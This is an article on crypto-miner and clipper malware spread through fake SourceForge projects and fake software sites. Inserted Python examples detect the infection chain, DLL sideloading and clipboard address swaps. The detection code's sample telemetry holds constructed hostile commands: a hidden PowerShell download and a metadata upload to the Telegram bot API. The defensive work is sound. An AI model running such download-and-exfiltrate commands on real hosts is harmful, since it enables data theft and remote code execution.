Crypto Malware Spreads via SourceForge Posing as Cracked Software


Malicious actors have taken advantage of SourceForge, a reputable software hosting platform, to propagate cryptocurrency miner and clipper malware, masquerading as cracked versions of popular applications. This deceptive tactic lures users into downloading harmful software under the guise of legitimate programs such as Microsoft Office, exposing them to significant cybersecurity threats.

Malicious Projects Masquerading as Legitimate Software

Kaspersky, a well-regarded cybersecurity firm, recently revealed that hackers are leveraging SourceForge to disseminate malware by creating fraudulent projects that impersonate legitimate software. One glaring example of this is a project titled “officepackage.” This project ostensibly offers various Microsoft Office add-ins, purportedly sourced from a legitimate GitHub repository. It appears authentic both in its description and content, as it mimics genuine details to deceive users. The strategy behind these fake projects is simple yet effective: attackers replicate the appearance of legitimate applications to create a false sense of security. Users believe they are downloading useful add-ins for their Microsoft Office suite, but in reality, they are stepping into a malware trap. The project “officepackage,” for instance, utilizes components and descriptions directly taken from GitHub, enhancing its illusion of legitimacy. This fraudulent setup on SourceForge, including the domain “officepackage.sourceforge[.]io,” lists numerous Microsoft Office applications and download links primarily in the Russian language, appealing specifically to Russian-speaking users.

Deceptive Download Links and Redirects

The deceptive practices by attackers don’t stop at just mimicking legitimate software projects. When users attempt to download applications from projects like “officepackage,” they encounter a website interface designed to appear convincing. Hovering over the download buttons reveals innocuous-looking URLs such as “loading.sourceforge[.]io/download.” This superficial authenticity builds a false sense of trust among users, making them believe the link will direct them to the intended software.

However, clicking the download button reroutes users to an unrelated webpage hosted on “taplink[.]cc.” Here, users face another download button, leading to the download of a 7 MB ZIP archive named “vinstaller.zip.” Upon opening this archive, users find another password-protected ZIP file (“installer.zip”) and a text file containing the necessary password. Within the protected ZIP file lies an MSI installer crafted to deploy malicious components. This installer includes a console archive utility known as “UnRAR.exe,” a RAR archive, and a VB script.

The VB script runs a PowerShell interpreter, which executes a batch file named “confvk” fetched from GitHub. This file harbors the password for the RAR archive and facilitates the execution of more malicious scripts. The batch file initiates two critical PowerShell scripts: one that transmits system metadata through the Telegram API, and another that downloads an additional script to act on the RAR archive contents. This intricate process ultimately leads to the deployment of malware payloads, specifically ClipBanker—a cryptocurrency miner and clipper malware.
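The chain above (a script host launching PowerShell, a batch file pulled from GitHub, system metadata posted to the Telegram bot API, and UnRAR.exe run out of a temporary directory) leaves a recognisable trail in process-creation telemetry. The following is an added detection example, not code from the article or from Kaspersky's report: it runs a few rules over constructed Sysmon-style process events. The URLs, paths and the bot token in the sample events are placeholders, and the rule thresholds are assumptions of this example.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (fields named after Sysmon event 1)."""
    parent_image: str
    image: str
    command_line: str


# Script hosts that should rarely need to spawn a PowerShell interpreter.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Indicators drawn from the infection chain described in the article.
GITHUB_RAW_RE = re.compile(r"raw\.githubusercontent\.com|github\.com/.+/raw/", re.I)
TELEGRAM_BOT_RE = re.compile(r"api\.telegram\.org/bot", re.I)
TEMP_DIR_RE = re.compile(r"\\(?:temp|appdata)\\", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_rules(ev: ProcessEvent) -> list[str]:
    """Return the names of every rule the event trips (empty list if benign)."""
    hits = []
    parent, image = basename(ev.parent_image), basename(ev.image)
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        hits.append("script_host_spawns_powershell")
    if image in POWERSHELL and GITHUB_RAW_RE.search(ev.command_line):
        hits.append("powershell_fetches_from_github")
    if TELEGRAM_BOT_RE.search(ev.command_line):
        hits.append("telegram_bot_api_in_command_line")
    if image == "unrar.exe" and TEMP_DIR_RE.search(ev.image):
        hits.append("unrar_executed_from_temp_dir")
    return hits


def triage(events: list[ProcessEvent]) -> list[tuple[int, list[str]]]:
    """Index and rule hits for every event that matched at least one rule."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := match_rules(ev))]


# Constructed sample telemetry; the repository, token and directory names are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(
        r"C:\Windows\System32\wscript.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -w hidden -c \"iwr https://raw.githubusercontent.com/"
        "EXAMPLE-USER/EXAMPLE-REPO/main/confvk -OutFile $env:TEMP\\confvk.bat\"",
    ),
    ProcessEvent(
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -c \"iwr https://api.telegram.org/botPLACEHOLDER_TOKEN/"
        "sendMessage -Method Post -Body $meta\"",
    ),
    ProcessEvent(
        r"C:\Windows\System32\cmd.exe",
        r"C:\Users\user\AppData\Local\Temp\MSI0000\UnRAR.exe",
        "UnRAR.exe x -pPLACEHOLDER payload.rar",
    ),
    # Benign: an administrator running a cmdlet from Explorer.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe Get-Process"),
]


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Each rule is weak on its own (administrators do fetch scripts from GitHub), so the value is in correlating several hits from one process tree within a short window; feeding real Sysmon or EDR exports into `triage` only requires mapping their field names onto `ProcessEvent`.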

Broader Implications and Additional Campaigns

The deployment of cryptocurrency malware via SourceForge is not an isolated incident. Kaspersky’s report highlights broader implications, suggesting that the malware scheme may enable attackers to gain system access, potentially selling it to more dangerous entities. This aspect underscores the significant threat posed to users who download software from unofficial sources.

Further complicating the picture, another campaign involves distributing a malware downloader known as TookPS. This downloader spreads via fraudulent sites imitating legitimate software platforms. For instance, sites like “deepseek-ai-soft[.]com” mimic the DeepSeek AI chatbot and various remote desktop and 3D modeling tools. These fake websites appear authentic and often rank high in sponsored Google search results, ensnaring unsuspecting users. TookPS’s primary function is to download and run PowerShell scripts that allow remote access to infected systems via SSH. The downloader also deploys a modified trojan called TeviRat, which gives attackers unrestrained access to victims’ computers.

Additionally, Kaspersky’s findings indicate the use of DLL sideloading techniques to alter TeamViewer remote access software on infected machines. By placing a malicious library alongside TeamViewer, hackers can modify its behavior stealthily, enabling covert remote access without the user’s awareness.
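Because sideloading works by dropping a DLL into the application's own directory, a simple integrity audit of that directory catches it: compare the DLLs present against a baseline taken from a clean install, and flag any DLL that is unexpected, has changed, or carries the name of a Windows system library (which an application directory should not normally contain). The code below is an added example, not part of the article or of Kaspersky's tooling; the baseline, the directory listing and the file names in it are constructed, and the TeamViewer install path is only illustrative.

```python
import hashlib
from pathlib import Path

# System DLL names that commonly get planted beside an application so the loader
# picks them up before the real copy in System32 (defender's watch-list, not exhaustive).
COMMONLY_SIDELOADED = {"version.dll", "dwmapi.dll", "userenv.dll", "cryptbase.dll", "wtsapi32.dll"}


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def audit_listing(listing: dict[str, bytes], baseline: dict[str, str]) -> list[tuple[str, str]]:
    """Compare {filename: contents} against {filename: sha256}; return sorted (file, issue) findings."""
    findings = []
    present = {name.lower(): data for name, data in listing.items()}
    for name, expected in baseline.items():
        if name not in present:
            findings.append((name, "baseline_dll_missing"))
        elif sha256(present[name]) != expected:
            findings.append((name, "hash_mismatch"))
    for name in present:
        if not name.endswith(".dll"):
            continue
        if name not in baseline:
            findings.append((name, "unexpected_dll"))
        if name in COMMONLY_SIDELOADED:
            findings.append((name, "system_dll_name_in_app_dir"))
    return sorted(findings)


def audit_directory(path: str, baseline: dict[str, str]) -> list[tuple[str, str]]:
    """Read a real application directory from disk and audit it (e.g. a TeamViewer install; path assumed)."""
    listing = {p.name: p.read_bytes() for p in Path(path).iterdir() if p.is_file()}
    return audit_listing(listing, baseline)


# Constructed baseline: one helper DLL that legitimately ships with the application.
GOOD_HELPER = b"constructed bytes of a legitimate helper DLL"
BASELINE = {"app_helper.dll": sha256(GOOD_HELPER)}

# Constructed post-compromise listing: the helper is intact, but a 'version.dll' has appeared.
SUSPICIOUS_LISTING = {
    "TeamViewer.exe": b"constructed executable bytes",
    "app_helper.dll": GOOD_HELPER,
    "version.dll": b"constructed bytes of a planted library",
}

CLEAN_LISTING = {"TeamViewer.exe": b"constructed executable bytes", "app_helper.dll": GOOD_HELPER}


if __name__ == "__main__":
    for file, issue in audit_listing(SUSPICIOUS_LISTING, BASELINE):
        print(f"{issue}: {file}")
```

A baseline keyed only on names and hashes will need refreshing at every legitimate update; pairing it with an Authenticode signature check (outside the scope of this example) keeps the false-positive rate down on updated builds.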

Evolving Threat Landscape

Malicious actors have exploited SourceForge, a respected software-hosting platform, to spread cryptocurrency miner and clipper malware. They disguise these harmful programs as cracked versions of popular applications, deceiving users into downloading what they think are legitimate software packages such as Microsoft Office. This treacherous tactic not only undermines the trust in well-known applications but also puts users at serious risk of cybersecurity threats. Instead of getting the desired software, users end up with malware that can drain their computer’s resources by mining cryptocurrencies or intercept and alter clipboard contents to steal sensitive information, such as cryptocurrency wallet addresses or other personal data. This kind of malicious attack highlights the importance of downloading software only from trusted sources and being wary of cracked versions, which often come with hidden dangers. SourceForge’s reputation as a reliable platform is being manipulated by these bad actors, stressing a need for greater vigilance and stronger security measures to protect users from such deceptive practices.
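Clipper malware of the kind described in this article and in the earlier ClipBanker section works by watching the clipboard and swapping a copied wallet address for one the attacker controls. The same behaviour is visible from the defender's side: a wallet address that turns into a different address of the same kind within a fraction of a second of being copied is almost never a user action. The code below is an added example, not from the article or Kaspersky's report; it applies that heuristic to a constructed sequence of clipboard snapshots, and the address formats, the 2-second window and the sample addresses are assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import Callable, Optional

# Rough recognisers for two widely used wallet-address formats (assumed for this example).
ADDRESS_KINDS = {
    "btc": re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{25,62})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def address_kind(text: str) -> Optional[str]:
    """Name of the wallet format the text matches, or None."""
    text = text.strip()
    return next((kind for kind, rx in ADDRESS_KINDS.items() if rx.match(text)), None)


@dataclass
class ClipboardSnapshot:
    t_ms: int   # time the clipboard was read
    text: str   # clipboard contents at that time


def detect_swaps(snapshots: list[ClipboardSnapshot], window_ms: int = 2000) -> list[dict]:
    """Flag consecutive snapshots where one address becomes a different address of the same kind
    within window_ms: the signature of a clipper rewriting what the user just copied."""
    findings = []
    for prev, cur in zip(snapshots, snapshots[1:]):
        kind = address_kind(prev.text)
        if kind is None or kind != address_kind(cur.text):
            continue
        delta = cur.t_ms - prev.t_ms
        if prev.text.strip() != cur.text.strip() and 0 <= delta <= window_ms:
            findings.append({"kind": kind, "from": prev.text, "to": cur.text, "delta_ms": delta})
    return findings


def monitor(read_clipboard: Callable[[], str], clock_ms: Callable[[], int],
            polls: int, window_ms: int = 2000) -> list[dict]:
    """Poll a clipboard source a fixed number of times and run the detector over the samples.
    On a real host, read_clipboard would wrap the platform clipboard API (assumed here)."""
    samples = [ClipboardSnapshot(clock_ms(), read_clipboard()) for _ in range(polls)]
    return detect_swaps(samples, window_ms)


# Constructed clipboard history. Addresses are synthetic strings that match the formats above.
USER_BTC = "1" + "A" * 33
SWAPPED_BTC = "1" + "B" * 33
USER_ETH = "0x" + "ab" * 20
LATER_ETH = "0x" + "cd" * 20

SAMPLE_HISTORY = [
    ClipboardSnapshot(0, "meeting notes"),
    ClipboardSnapshot(1000, USER_BTC),      # user copies their address
    ClipboardSnapshot(1200, SWAPPED_BTC),   # 200 ms later it is a different address: swap
    ClipboardSnapshot(5000, USER_ETH),      # user copies an ETH address
    ClipboardSnapshot(20000, LATER_ETH),    # a different ETH address 15 s later: normal use
]


if __name__ == "__main__":
    for f in detect_swaps(SAMPLE_HISTORY):
        print(f"{f['kind']} address replaced after {f['delta_ms']} ms: {f['from']} -> {f['to']}")
```

The heuristic is deliberately conservative: it only fires on same-kind substitutions inside the window, so ordinary copy-and-paste of several addresses over a session is not reported. Polling resolution bounds what it can see; a clipper that rewrites faster than the poll interval shows up only as the address never having matched what the user copied, which is the check to add on the paste side.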
